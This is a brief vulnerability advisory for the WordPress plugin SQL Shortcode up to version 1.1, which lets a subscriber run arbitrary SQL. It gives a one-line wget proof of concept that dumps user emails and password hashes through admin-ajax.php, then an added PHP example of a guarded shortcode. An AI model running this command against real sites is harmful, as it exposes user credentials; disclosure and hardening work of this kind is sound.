wpexploit | Paul Dannewitz | WPEX-ID: 679DD99D-7227-4C73-BD76-949E38B59220
Published: Sep 02, 2017

SQL Shortcode <= 1.1 - Authenticated SQL Execution


It’s not an SQL injection actually, it’s just executing SQL with an account as low-privileged as a subscriber. The plugin description says it all. This great article (https://blog.sucuri.net/2016/08/sql-injection-vulnerability-ninja-forms.html) will help you understand how to exploit shortcodes and why this works.

Vulnerabilities: Execute whatever SQL you want to execute.

Found by: Paul Dannewitz

Other vulnerabilities I submitted to wpvulndb: https://wpvulndb.com/search?utf8=✓&text=Paul+Dannewitz

wget --load-cookies cookie_file_with_cookies_of_just_a_subscriber_account.txt --post-data="action=parse-media-shortcode&shortcode=[sql]SELECT user_email, user_pass FROM wp_users[/sql]" wordpress.app/wp-admin/admin-ajax.php

Make sure the cookie file has the right format (Netscape), useful converter: http://crdx.org/misc/cookies/
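As an added example (not the SQL Shortcode plugin's own code, and not part of this advisory), here is what a guarded shortcode callback looks like in PHP: the capability check sits inside the callback itself, because WordPress core's parse-media-shortcode AJAX action calls do_shortcode() on whatever a logged-in user posts, so a check done only when a post is saved is bypassed. Names prefixed example_ are hypothetical.

```php
<?php
// Added example, not the plugin's code: a shortcode callback that refuses to
// run SQL unless the *current* user is an administrator. The check must live
// here, not at post-save time, because wp-admin/admin-ajax.php
// (action=parse-media-shortcode) runs do_shortcode() for any logged-in user.

add_shortcode( 'sql', 'example_guarded_sql_shortcode' ); // example_ = hypothetical name

function example_guarded_sql_shortcode( $atts, $content = '' ) {
    global $wpdb;

    // Capability check: a subscriber fails here and gets an empty string,
    // so nothing about the query or the database is revealed.
    if ( ! current_user_can( 'manage_options' ) ) {
        return '';
    }

    // Defence in depth: accept only a single read-only statement from the
    // shortcode body; multi-statement or non-SELECT input is dropped.
    $sql = trim( html_entity_decode( $content ) );
    if ( ! preg_match( '/^SELECT\b/i', $sql ) || strpos( $sql, ';' ) !== false ) {
        return '';
    }

    $rows = $wpdb->get_results( $sql, ARRAY_A );
    if ( empty( $rows ) ) {
        return '';
    }

    // Escape every cell so query results cannot inject HTML into the page.
    $out = '<table>';
    foreach ( $rows as $row ) {
        $out .= '<tr>';
        foreach ( $row as $cell ) {
            $out .= '<td>' . esc_html( (string) $cell ) . '</td>';
        }
        $out .= '</tr>';
    }
    return $out . '</table>';
}
```

The SELECT filter is only a secondary guard; the capability check is what closes the path used in the PoC above, since an administrator can already read the database by design.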